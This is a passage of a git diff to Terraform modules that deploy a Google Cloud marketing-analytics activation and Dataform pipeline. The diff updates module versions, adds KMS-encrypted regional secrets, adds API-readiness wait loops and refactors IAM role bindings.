"australia-southeast1", + "southamerica-east1" + ] + } data "google_project" "activation_project" { @@ -69,7 +80,7 @@ data "google_project" "activation_project" { module "project_services" { source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" + version = "18.0.0" disable_dependent_services = false disable_services_on_destroy = false @@ -92,6 +103,7 @@ module "project_services" { "analyticsadmin.googleapis.com", "eventarc.googleapis.com", "run.googleapis.com", + "cloudkms.googleapis.com" ] } @@ -301,11 +313,47 @@ resource "null_resource" "check_cloudbuild_api" { depends_on = [ module.project_services ] + + # The lifecycle block of the google_artifact_registry_repository resource defines a precondition that + # checks if the specified region is included in the vertex_pipelines_available_locations list. + # If the condition is not met, an error message is displayed and the Terraform configuration will fail. + lifecycle { + precondition { + condition = contains(local.cloud_build_available_locations, var.location) + error_message = "Cloud Build is not available in your default region: ${var.location}.\nSet 'google_default_region' variable to a valid Cloud Build location, see Restricted Regions in https://cloud.google.com/build/docs/locations." + } + } +} + +# This resource executes gcloud commands to check whether the IAM API is enabled. +# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. +resource "null_resource" "check_cloudkms_api" { + provisioner "local-exec" { + command = <<-EOT + COUNTER=0 + MAX_TRIES=100 + while ! gcloud services list --project=${module.project_services.project_id} | grep -i "cloudkms.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] + do + sleep 6 + printf "." + COUNTER=$((COUNTER + 1)) + done + if [ $COUNTER -eq $MAX_TRIES ]; then + echo "cloud kms api is not enabled, terraform can not continue!" + exit 1 + fi + sleep 20 + EOT + } + + depends_on = [ + module.project_services + ] } module "bigquery" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" dataset_id = local.app_prefix dataset_name = local.app_prefix @@ -322,10 +370,11 @@ resource "null_resource" "create_custom_events" { triggers = { services_enabled_project = null_resource.check_analyticsadmin_api.id != "" ? module.project_services.project_id : var.project_id source_contents_hash = local.activation_type_configuration_file_content_hash + source_file_content_hash = local.ga4_setup_source_file_content_hash } provisioner "local-exec" { command = <<-EOT - ${local.poetry_run_alias} ga4-setup --ga4_resource=custom_events --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id} + ${var.uv_run_alias} ga4-setup --ga4_resource=custom_events --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id} EOT working_dir = local.source_root_dir } @@ -337,12 +386,13 @@ resource "null_resource" "create_custom_events" { resource "null_resource" "create_custom_dimensions" { triggers = { services_enabled_project = null_resource.check_analyticsadmin_api.id != "" ? module.project_services.project_id : var.project_id + source_file_content_hash = local.ga4_setup_source_file_content_hash #source_activation_type_configuration_hash = local.activation_type_configuration_file_content_hash #source_activation_application_python_hash = local.activation_application_content_hash } provisioner "local-exec" { command = <<-EOT - ${local.poetry_run_alias} ga4-setup --ga4_resource=custom_dimensions --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id} + ${var.uv_run_alias} ga4-setup --ga4_resource=custom_dimensions --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id} EOT working_dir = local.source_root_dir } @@ -359,7 +409,7 @@ resource "google_artifact_registry_repository" "activation_repository" { module "pipeline_service_account" { source = "terraform-google-modules/service-accounts/google" - version = "~> 3.0" + version = "4.4.3" project_id = null_resource.check_dataflow_api.id != "" ? module.project_services.project_id : var.project_id prefix = local.app_prefix names = [local.pipeline_service_account_name] @@ -368,7 +418,7 @@ module "pipeline_service_account" { "${module.project_services.project_id}=>roles/dataflow.worker", "${module.project_services.project_id}=>roles/bigquery.dataEditor", "${module.project_services.project_id}=>roles/bigquery.jobUser", - "${module.project_services.project_id}=>roles/artifactregistry.writer", + "${module.project_services.project_id}=>roles/artifactregistry.writer", ] display_name = "Dataflow worker Service Account" description = "Activation Dataflow worker Service Account" @@ -376,7 +426,7 @@ module "pipeline_service_account" { module "trigger_function_account" { source = "terraform-google-modules/service-accounts/google" - version = "~> 3.0" + version = "4.4.3" project_id = null_resource.check_pubsub_api.id != "" ? module.project_services.project_id : var.project_id prefix = local.app_prefix names = [local.trigger_function_account_name] @@ -398,48 +448,139 @@ module "trigger_function_account" { # a python command defined in the module ga4_setup. # This informatoin can then be used in other parts of the Terraform configuration to access the retrieved information. data "external" "ga4_measurement_properties" { - program = ["bash", "-c", "${local.poetry_run_alias} ga4-setup --ga4_resource=measurement_properties --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id}"] + program = ["bash", "-c", "${var.uv_run_alias} ga4-setup --ga4_resource=measurement_properties --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id}"] working_dir = local.source_root_dir # The count attribute specifies how many times the external data source should be executed. # This means that the external data source will be executed only if either the # var.ga4_measurement_id or var.ga4_measurement_secret variable is not set. - count = (var.ga4_measurement_id == null || var.ga4_measurement_secret == null || var.ga4_measurement_id == "" || var.ga4_measurement_secret == "") ? 1 : 0 + count = (var.ga4_measurement_id == null || var.ga4_measurement_secret == null || var.ga4_measurement_id == "" || var.ga4_measurement_secret == "") ? 1 : 0 depends_on = [ module.project_services ] } +# It's used to create unique names for resources like KMS key rings or crypto keys, +# ensuring they don't clash with existing resources. +resource "random_id" "random_suffix" { + byte_length = 2 +} + +# This ensures that Secret Manager has a service identity within your project. +# This identity is crucial for securely managing secrets and allowing Secret Manager +# to interact with other Google Cloud services on your behalf. +resource "google_project_service_identity" "secretmanager_sa" { + provider = google-beta + project = null_resource.check_cloudkms_api.id != "" ? module.project_services.project_id : var.project_id + service = "secretmanager.googleapis.com" +} +# This Key Ring can then be used to store and manage encryption keys for various purposes, +# such as encrypting data at rest or protecting secrets. +resource "google_kms_key_ring" "key_ring_regional" { + name = "key_ring_regional-${random_id.random_suffix.hex}" + # If you want your replicas in other locations, change the location in the var.location variable passed as a parameter to this submodule. + # if you your replicas stored global, set the location = "global". + location = var.location + project = null_resource.check_cloudkms_api.id != "" ? module.project_services.project_id : var.project_id +} + +# This key can then be used for various encryption operations, +# such as encrypting data before storing it in Google Cloud Storage +# or protecting secrets within your application. +resource "google_kms_crypto_key" "crypto_key_regional" { + name = "crypto-key-${random_id.random_suffix.hex}" + key_ring = google_kms_key_ring.key_ring_regional.id +} + +# Defines an IAM policy that explicitly grants the Secret Manager service account +# the ability to encrypt and decrypt data using a specific CryptoKey. This is a +# common pattern for securely managing secrets, allowing Secret Manager to encrypt +# or decrypt data without requiring direct access to the underlying encryption key material. +data "google_iam_policy" "crypto_key_encrypter_decrypter" { + binding { + role = "roles/cloudkms.cryptoKeyEncrypterDecrypter" + + members = [ + "serviceAccount:${google_project_service_identity.secretmanager_sa.email}" + ] + } + + depends_on = [ + google_project_service_identity.secretmanager_sa, + google_kms_key_ring.key_ring_regional, + google_kms_crypto_key.crypto_key_regional + ] +} + +# It sets the IAM policy for a KMS CryptoKey, specifically granting permissions defined +# in another data source. +resource "google_kms_crypto_key_iam_policy" "crypto_key" { + crypto_key_id = google_kms_crypto_key.crypto_key_regional.id + policy_data = data.google_iam_policy.crypto_key_encrypter_decrypter.policy_data +} + +# It sets the IAM policy for a KMS Key Ring, granting specific permissions defined +# in a data source. +resource "google_kms_key_ring_iam_policy" "key_ring" { + key_ring_id = google_kms_key_ring.key_ring_regional.id + policy_data = data.google_iam_policy.crypto_key_encrypter_decrypter.policy_data +} + # This module stores the values ga4-measurement-id and ga4-measurement-secret in Google Cloud Secret Manager. module "secret_manager" { source = "GoogleCloudPlatform/secret-manager/google" - version = "~> 0.1" - project_id = null_resource.check_secretmanager_api.id != "" ? module.project_services.project_id : var.project_id + version = "0.7.0" + project_id = google_kms_crypto_key_iam_policy.crypto_key.etag != "" && google_kms_key_ring_iam_policy.key_ring.etag != "" ? module.project_services.project_id : var.project_id secrets = [ { name = "ga4-measurement-id" secret_data = (var.ga4_measurement_id == null || var.ga4_measurement_secret == null) ? data.external.ga4_measurement_properties[0].result["measurement_id"] : var.ga4_measurement_id - automatic_replication = true + automatic_replication = false }, { name = "ga4-measurement-secret" secret_data = (var.ga4_measurement_id == null || var.ga4_measurement_secret == null) ? data.external.ga4_measurement_properties[0].result["measurement_secret"] : var.ga4_measurement_secret - automatic_replication = true + automatic_replication = false }, ] + # By commenting the user_managed_replication block, you will deploy replicas that may store the secret in different locations in the globe. + # This is not a desired behaviour, make sure you're aware of it before doing it. + # By default, to respect resources location, we prevent resources from being deployed globally by deploying secrets in the same region of the compute resources. + user_managed_replication = { + ga4-measurement-id = [ + # If you want your replicas in other locations, uncomment the following lines and add them here. + # Check this example, as reference: https://github.com/GoogleCloudPlatform/terraform-google-secret-manager/blob/main/examples/multiple/main.tf#L91 + { + location = var.location + kms_key_name = google_kms_crypto_key.crypto_key_regional.id + } + ] + ga4-measurement-secret = [ + { + location = var.location + kms_key_name = google_kms_crypto_key.crypto_key_regional.id + } + ] + } + depends_on = [ - data.external.ga4_measurement_properties + data.external.ga4_measurement_properties, + google_kms_crypto_key.crypto_key_regional, + google_kms_key_ring.key_ring_regional, + google_project_service_identity.secretmanager_sa, + google_kms_crypto_key_iam_policy.crypto_key, + google_kms_key_ring_iam_policy.key_ring ] } # This module creates a Cloud Storage bucket to be used by the Activation Application module "pipeline_bucket" { - source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" - version = "~> 3.4.1" - project_id = null_resource.check_dataflow_api.id != "" ? module.project_services.project_id : var.project_id - name = "${local.app_prefix}-app-${module.project_services.project_id}" - location = var.location + source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" + version = "9.0.1" + project_id = null_resource.check_dataflow_api.id != "" ? module.project_services.project_id : var.project_id + name = "${local.app_prefix}-app-${module.project_services.project_id}" + location = var.location # When deleting a bucket, this boolean option will delete all contained objects. # If false, Terraform will fail to delete buckets which contain objects. force_destroy = true @@ -471,8 +612,8 @@ resource "google_project_iam_member" "cloud_build_job_service_account" { module.project_services, null_resource.check_artifactregistry_api, data.google_project.project, - ] - + ] + project = null_resource.check_artifactregistry_api.id != "" ? module.project_services.project_id : var.project_id member = "serviceAccount:${var.project_number}-compute@developer.gserviceaccount.com" @@ -516,16 +657,16 @@ resource "google_project_iam_member" "cloud_build_job_service_account" { } data "google_project" "project" { - project_id = null_resource.check_cloudbuild_api != "" ? module.project_services.project_id : var.project_id + project_id = null_resource.check_cloudbuild_api != "" ? module.project_services.project_id : var.project_id } # This module creates a Cloud Storage bucket to be used by the Cloud Build Log Bucket module "build_logs_bucket" { - source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" - version = "~> 3.4.1" - project_id = null_resource.check_cloudbuild_api != "" ? module.project_services.project_id : var.project_id - name = "${local.app_prefix}-logs-${module.project_services.project_id}" - location = var.location + source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" + version = "9.0.1" + project_id = null_resource.check_cloudbuild_api != "" ? module.project_services.project_id : var.project_id + name = "${local.app_prefix}-logs-${module.project_services.project_id}" + location = var.location # When deleting a bucket, this boolean option will delete all contained objects. # If false, Terraform will fail to delete buckets which contain objects. force_destroy = true @@ -543,8 +684,8 @@ module "build_logs_bucket" { iam_members = [ { - role = "roles/storage.admin" - member = "serviceAccount:${var.project_number}-compute@developer.gserviceaccount.com" + role = "roles/storage.admin" + member = "serviceAccount:${var.project_number}-compute@developer.gserviceaccount.com" } ] @@ -554,13 +695,6 @@ module "build_logs_bucket" { ] } -# This resource creates a bucket object using as content the measurement_protocol_payload_template_file file. -resource "google_storage_bucket_object" "measurement_protocol_payload_template_file" { - name = "${local.configuration_folder}/${local.measurement_protocol_payload_template_file}" - source = "${local.template_dir}/${local.measurement_protocol_payload_template_file}" - bucket = module.pipeline_bucket.name -} - # This resource creates a bucket object using as content the audience_segmentation_query_template_file file. data "template_file" "audience_segmentation_query_template_file" { template = file("${local.template_dir}/activation_query/${local.audience_segmentation_query_template_file}") @@ -618,7 +752,7 @@ data "template_file" "churn_propensity_query_template_file" { } } -# This resource creates a bucket object using as content the purchase_propensity_query_template_file file. +# This resource creates a bucket object using as content the churn_propensity_query_template_file file. resource "google_storage_bucket_object" "churn_propensity_query_template_file" { name = "${local.configuration_folder}/${local.churn_propensity_query_template_file}" content = data.template_file.churn_propensity_query_template_file.rendered @@ -641,6 +775,58 @@ resource "google_storage_bucket_object" "purchase_propensity_query_template_file bucket = module.pipeline_bucket.name } +# This resource creates a bucket object using as content the purchase_propensity_vbb_query_template_file file. +data "template_file" "purchase_propensity_vbb_query_template_file" { + template = file("${local.template_dir}/activation_query/${local.purchase_propensity_vbb_query_template_file}") + + vars = { + mds_project_id = var.mds_project_id + mds_dataset_suffix = var.mds_dataset_suffix + activation_project_id = var.project_id + dataset = module.bigquery.bigquery_dataset.dataset_id + } +} + +resource "google_storage_bucket_object" "purchase_propensity_vbb_query_template_file" { + name = "${local.configuration_folder}/${local.purchase_propensity_vbb_query_template_file}" + content = data.template_file.purchase_propensity_vbb_query_template_file.rendered + bucket = module.pipeline_bucket.name +} + +data "template_file" "lead_score_propensity_query_template_file" { + template = file("${local.template_dir}/activation_query/${local.lead_score_propensity_query_template_file}") + + vars = { + mds_project_id = var.mds_project_id + mds_dataset_suffix = var.mds_dataset_suffix + } +} + +# This resource creates a bucket object using as content the lead_score_propensity_query_template_file file. +resource "google_storage_bucket_object" "lead_score_propensity_query_template_file" { + name = "${local.configuration_folder}/${local.lead_score_propensity_query_template_file}" + content = data.template_file.lead_score_propensity_query_template_file.rendered + bucket = module.pipeline_bucket.name +} + +# This resource creates a bucket object using as content the lead_score_propensity_vbb_query_template_file file. +data "template_file" "lead_score_propensity_vbb_query_template_file" { + template = file("${local.template_dir}/activation_query/${local.lead_score_propensity_vbb_query_template_file}") + + vars = { + mds_project_id = var.mds_project_id + mds_dataset_suffix = var.mds_dataset_suffix + activation_project_id = var.project_id + dataset = module.bigquery.bigquery_dataset.dataset_id + } +} + +resource "google_storage_bucket_object" "lead_score_propensity_vbb_query_template_file" { + name = "${local.configuration_folder}/${local.lead_score_propensity_vbb_query_template_file}" + content = data.template_file.lead_score_propensity_vbb_query_template_file.rendered + bucket = module.pipeline_bucket.name +} + # This data resources creates a data resource that renders a template file and stores the rendered content in a variable. data "template_file" "activation_type_configuration" { template = file("${local.template_dir}/activation_type_configuration_template.tpl") @@ -650,16 +836,18 @@ data "template_file" "activation_type_configuration" { auto_audience_segmentation_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.auto_audience_segmentation_query_template_file.output_name}" cltv_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.cltv_query_template_file.output_name}" purchase_propensity_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.purchase_propensity_query_template_file.output_name}" + purchase_propensity_vbb_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.purchase_propensity_vbb_query_template_file.output_name}" churn_propensity_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.churn_propensity_query_template_file.output_name}" - measurement_protocol_payload_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.measurement_protocol_payload_template_file.output_name}" + lead_score_propensity_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.lead_score_propensity_query_template_file.output_name}" + lead_score_propensity_vbb_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.lead_score_propensity_vbb_query_template_file.output_name}" } } # This resource creates a bucket object using as content the activation_type_configuration.json file. resource "google_storage_bucket_object" "activation_type_configuration_file" { - name = "${local.configuration_folder}/activation_type_configuration.json" - content = data.template_file.activation_type_configuration.rendered - bucket = module.pipeline_bucket.name + name = "${local.configuration_folder}/activation_type_configuration.json" + content = data.template_file.activation_type_configuration.rendered + bucket = module.pipeline_bucket.name # Detects md5hash changes to redeploy this file to the GCS bucket. detect_md5hash = base64encode("${local.activation_type_configuration_file_content_hash}${local.activation_application_content_hash}") } @@ -667,12 +855,19 @@ resource "google_storage_bucket_object" "activation_type_configuration_file" { # This module submits a gcloud build to build a docker container image to be used by the Activation Application module "activation_pipeline_container" { source = "terraform-google-modules/gcloud/google" - version = "3.1.2" + version = "3.5.0" platform = "linux" - #create_cmd_body = "builds submit --project=${module.project_services.project_id} --tag ${local.docker_repo_prefix}/${google_artifact_registry_repository.activation_repository.name}/${local.activation_container_name}:latest ${local.pipeline_source_dir}" - create_cmd_body = "builds submit --project=${module.project_services.project_id} --tag ${local.docker_repo_prefix}/${google_artifact_registry_repository.activation_repository.name}/${local.activation_container_name}:latest --gcs-log-dir=gs://${module.build_logs_bucket.name} ${local.pipeline_source_dir}" + create_cmd_body = <<-EOT + builds submit \ + --project=${module.project_services.project_id} \ + --region ${var.location} \ + --default-buckets-behavior=regional-user-owned-bucket \ + --tag ${local.docker_repo_prefix}/${google_artifact_registry_repository.activation_repository.name}/${local.activation_container_name}:latest \ + --gcs-log-dir=gs://${module.build_logs_bucket.name} \ + ${local.pipeline_source_dir} + EOT destroy_cmd_body = "artifacts docker images delete --project=${module.project_services.project_id} ${local.docker_repo_prefix}/${google_artifact_registry_repository.activation_repository.name}/${local.activation_container_name} --delete-tags" create_cmd_triggers = { @@ -686,9 +881,8 @@ module "activation_pipeline_container" { # This module executes a gcloud command to build a dataflow flex template and uploads it to Dataflow module "activation_pipeline_template" { - source = "terraform-google-modules/gcloud/google" - version = "3.1.2" - additional_components = ["gsutil"] + source = "terraform-google-modules/gcloud/google" + version = "3.5.0" platform = "linux" create_cmd_body = "dataflow flex-template build --project=${module.project_services.project_id} \"gs://${module.pipeline_bucket.name}/dataflow/templates/${local.activation_container_image_id}.json\" --image \"${local.docker_repo_prefix}/${google_artifact_registry_repository.activation_repository.name}/${local.activation_container_name}:latest\" --sdk-language \"PYTHON\" --metadata-file \"${local.pipeline_source_dir}/metadata.json\"" @@ -718,11 +912,11 @@ data "archive_file" "activation_trigger_source" { # This module creates a Cloud Sorage bucket and sets the trigger_function_account_email as the admin. module "function_bucket" { - source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" - version = "~> 3.4.1" - project_id = null_resource.check_cloudfunctions_api.id != "" ? module.project_services.project_id : var.project_id - name = "${local.app_prefix}-trigger-${module.project_services.project_id}" - location = var.location + source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" + version = "9.0.1" + project_id = null_resource.check_cloudfunctions_api.id != "" ? module.project_services.project_id : var.project_id + name = "${local.app_prefix}-trigger-${module.project_services.project_id}" + location = var.location # When deleting a bucket, this boolean option will delete all contained objects. # If false, Terraform will fail to delete buckets which contain objects. force_destroy = true @@ -750,7 +944,7 @@ module "function_bucket" { # This resource creates a bucket object using as content the activation_trigger_archive zip file. resource "google_storage_bucket_object" "activation_trigger_archive" { - name = local.source_archive_file + name = "${local.source_archive_file_prefix}_${data.archive_file.activation_trigger_source.output_sha256}.zip" source = data.archive_file.activation_trigger_source.output_path bucket = module.function_bucket.name } @@ -821,7 +1015,7 @@ resource "google_cloudfunctions2_function" "activation_trigger_cf" { # This modules runs cloud commands that adds an invoker policy binding to a Cloud Function, allowing a specific service account to invoke the function. module "add_invoker_binding" { source = "terraform-google-modules/gcloud/google" - version = "3.1.2" + version = "3.5.0" platform = "linux" diff --git a/infrastructure/terraform/modules/activation/outputs.tf b/infrastructure/terraform/modules/activation/outputs.tf index f388db1d..da23673a 100644 --- a/infrastructure/terraform/modules/activation/outputs.tf +++ b/infrastructure/terraform/modules/activation/outputs.tf @@ -16,3 +16,8 @@ output "trigger_topic" { description = "activation trigger topic" value = google_pubsub_topic.activation_trigger.name } + +output "configuration_table_name" { + description = "smart bidding configuration table name" + value = split("/", google_bigquery_table.smart_bidding_configuration.id)[5] +} diff --git a/infrastructure/terraform/modules/activation/variables.tf b/infrastructure/terraform/modules/activation/variables.tf index d3fb4759..5814361b 100644 --- a/infrastructure/terraform/modules/activation/variables.tf +++ b/infrastructure/terraform/modules/activation/variables.tf @@ -43,8 +43,8 @@ variable "trigger_function_location" { type = string } -variable "poetry_cmd" { - description = "alias for poetry command on the current system" +variable "uv_run_alias" { + description = "alias for uv run command on the current system" type = string } @@ -72,11 +72,6 @@ variable "ga4_stream_id" { type = string } -variable "poetry_installed" { - description = "Construct to specify dependency to poetry installed" - type = string -} - variable "mds_project_id" { type = string description = "MDS Project ID" @@ -90,4 +85,4 @@ variable "mds_dataset_suffix" { variable "project_owner_email" { description = "Email address of the project owner." type = string -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/activation/versions.tf b/infrastructure/terraform/modules/activation/versions.tf index 5a896e28..2e275387 100644 --- a/infrastructure/terraform/modules/activation/versions.tf +++ b/infrastructure/terraform/modules/activation/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/modules/data-store/data-processing-services.tf b/infrastructure/terraform/modules/data-store/data-processing-services.tf index dd7e66b9..c46df258 100644 --- a/infrastructure/terraform/modules/data-store/data-processing-services.tf +++ b/infrastructure/terraform/modules/data-store/data-processing-services.tf @@ -16,7 +16,7 @@ # https://registry.terraform.io/modules/terraform-google-modules/project-factory/google/latest/submodules/project_services module "data_processing_project_services" { source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" + version = "18.0.0" disable_dependent_services = false disable_services_on_destroy = false @@ -116,4 +116,4 @@ resource "null_resource" "check_dataform_api" { depends_on = [ module.data_processing_project_services ] -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/data-store/dataform.tf b/infrastructure/terraform/modules/data-store/dataform.tf index 2c4d600e..24944803 100644 --- a/infrastructure/terraform/modules/data-store/dataform.tf +++ b/infrastructure/terraform/modules/data-store/dataform.tf @@ -54,9 +54,9 @@ locals { resource "google_dataform_repository" "marketing-analytics" { provider = google-beta # This is the name of the Dataform Repository created in your project - name = "marketing-analytics" - project = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id - region = local.dataform_derived_region + name = "marketing-analytics" + project = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + region = local.dataform_derived_region lifecycle { precondition { @@ -74,4 +74,4 @@ resource "google_dataform_repository" "marketing-analytics" { depends_on = [ module.data_processing_project_services ] -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/data-store/iam-binding.tf b/infrastructure/terraform/modules/data-store/iam-binding.tf index 4cac19f7..564efd16 100644 --- a/infrastructure/terraform/modules/data-store/iam-binding.tf +++ b/infrastructure/terraform/modules/data-store/iam-binding.tf @@ -12,18 +12,6 @@ # See the License for the specific language governing permissions and # limitations under the License. -# TODO: we might not need to have this email role at all. -resource "google_project_iam_member" "email-role" { - for_each = toset([ - "roles/iam.serviceAccountUser", // TODO: is it really needed? - "roles/dataform.admin", - "roles/dataform.editor" - ]) - role = each.key - member = "user:${var.project_owner_email}" - project = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id -} - # Check the Dataform Service Account Access Requirements for more information # https://cloud.google.com/dataform/docs/required-access locals { @@ -38,7 +26,7 @@ resource "null_resource" "wait_for_dataform_sa_creation" { MAX_TRIES=100 while ! gcloud asset search-all-iam-policies --scope=projects/${module.data_processing_project_services.project_id} --flatten="policy.bindings[].members[]" --filter="policy.bindings.members~\"serviceAccount:\"" --format="value(policy.bindings.members.split(sep=\":\").slice(1))" | grep -i "${local.dataform_sa}" && [ $COUNTER -lt $MAX_TRIES ] do - sleep 3 + sleep 10 printf "." COUNTER=$((COUNTER + 1)) done @@ -46,7 +34,7 @@ resource "null_resource" "wait_for_dataform_sa_creation" { echo "dataform service account was not created, terraform can not continue!" exit 1 fi - sleep 20 + sleep 120 EOT } @@ -56,61 +44,185 @@ resource "null_resource" "wait_for_dataform_sa_creation" { ] } +module "email-role" { + source = "terraform-google-modules/iam/google//modules/member_iam" + version = "~> 8.0" + + service_account_address = var.project_owner_email + project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + project_roles = [ + "roles/iam.serviceAccountUser", // TODO: is it really needed? + "roles/dataform.admin", + "roles/dataform.editor" + ] + prefix = "user" +} +#resource "google_project_iam_member" "email-role" { +# for_each = toset([ +# "roles/iam.serviceAccountUser", // TODO: is it really needed? +# "roles/dataform.admin", +# "roles/dataform.editor" +# ]) +# role = each.key +# member = "user:${var.project_owner_email}" +# project = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id +#} + +# Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_email_role_propagation" { + create_duration = "120s" + depends_on = [ + module.email-role + ] +} + # This resource sets the Dataform service account IAM member roles -resource "google_project_iam_member" "dataform-serviceaccount" { +module "dataform-serviceaccount" { + source = "terraform-google-modules/iam/google//modules/member_iam" + version = "~> 8.0" depends_on = [ google_dataform_repository.marketing-analytics, null_resource.check_dataform_api, - null_resource.wait_for_dataform_sa_creation - ] - for_each = toset([ + null_resource.wait_for_dataform_sa_creation, + time_sleep.wait_for_email_role_propagation + ] + service_account_address = local.dataform_sa + project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + project_roles = [ "roles/secretmanager.secretAccessor", - "roles/bigquery.jobUser" - ]) - role = each.key - member = "serviceAccount:${local.dataform_sa}" - project = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + "roles/bigquery.jobUser", + "roles/bigquery.dataOwner", + ] + prefix = "serviceAccount" } +# This resource sets the Dataform service account IAM member roles +#resource "google_project_iam_member" "dataform-serviceaccount" { +# depends_on = [ +# google_dataform_repository.marketing-analytics, +# null_resource.check_dataform_api, +# null_resource.wait_for_dataform_sa_creation, +# time_sleep.wait_for_email_role_propagation +# ] +# for_each = toset([ +# "roles/secretmanager.secretAccessor", +# "roles/bigquery.jobUser", +# "roles/bigquery.dataOwner", +# ]) +# role = each.key +# member = "serviceAccount:${local.dataform_sa}" +# project = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id +#} -// Owner role to BigQuery in the destination data project the Dataform SA. -// Multiple datasets will be created; it requires project-level permissions -resource "google_project_iam_member" "dataform-bigquery-data-owner" { +# Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_dataform-serviceaccount_role_propagation" { + create_duration = "120s" depends_on = [ - google_dataform_repository.marketing-analytics, - null_resource.check_dataform_api, - null_resource.wait_for_dataform_sa_creation - ] - for_each = toset([ - "roles/bigquery.dataOwner", - ]) - role = each.key - member = "serviceAccount:${local.dataform_sa}" - project = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + module.dataform-serviceaccount + ] } // Read access to the GA4 exports -resource "google_bigquery_dataset_iam_member" "dataform-ga4-export-reader" { +module "dataform-ga4-export-reader" { + source = "terraform-google-modules/iam/google//modules/bigquery_datasets_iam" + version = "~> 8.0" depends_on = [ google_dataform_repository.marketing-analytics, null_resource.check_dataform_api, - null_resource.wait_for_dataform_sa_creation + null_resource.wait_for_dataform_sa_creation, + time_sleep.wait_for_dataform-serviceaccount_role_propagation + ] + project = var.source_ga4_export_project_id + bigquery_datasets = [ + var.source_ga4_export_dataset, + ] + mode = "authoritative" + + bindings = { + "roles/bigquery.dataViewer" = [ + "serviceAccount:${local.dataform_sa}", + ] + "roles/bigquery.dataEditor" = [ + "serviceAccount:${local.dataform_sa}", ] - role = "roles/bigquery.dataViewer" - member = "serviceAccount:${local.dataform_sa}" - project = var.source_ga4_export_project_id - dataset_id = var.source_ga4_export_dataset + } +} +#resource "google_bigquery_dataset_iam_member" "dataform-ga4-export-reader" { +# depends_on = [ +# google_dataform_repository.marketing-analytics, +# null_resource.check_dataform_api, +# null_resource.wait_for_dataform_sa_creation, +# time_sleep.wait_for_dataform-serviceaccount_role_propagation +# ] +# role = "roles/bigquery.dataViewer" +# member = "serviceAccount:${local.dataform_sa}" +# project = var.source_ga4_export_project_id +# dataset_id = var.source_ga4_export_dataset +#} + +# Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_dataform-ga4-export-reader_role_propagation" { + create_duration = "120s" + depends_on = [ + module.dataform-ga4-export-reader + ] } // Read access to the Ads datasets -resource "google_bigquery_dataset_iam_member" "dataform-ads-export-reader" { +module "dataform-ads-export-reader" { + source = "terraform-google-modules/iam/google//modules/bigquery_datasets_iam" + version = "~> 8.0" depends_on = [ google_dataform_repository.marketing-analytics, null_resource.check_dataform_api, - null_resource.wait_for_dataform_sa_creation + null_resource.wait_for_dataform_sa_creation, + time_sleep.wait_for_dataform-ga4-export-reader_role_propagation + ] + count = length(var.source_ads_export_data) + project = var.source_ads_export_data[count.index].project + bigquery_datasets = [ + var.source_ads_export_data[count.index].dataset, + ] + mode = "authoritative" + + bindings = { + "roles/bigquery.dataViewer" = [ + "serviceAccount:${local.dataform_sa}", + ] + "roles/bigquery.dataEditor" = [ + "serviceAccount:${local.dataform_sa}", ] - count = length(var.source_ads_export_data) - role = "roles/bigquery.dataViewer" - member = "serviceAccount:${local.dataform_sa}" - project = 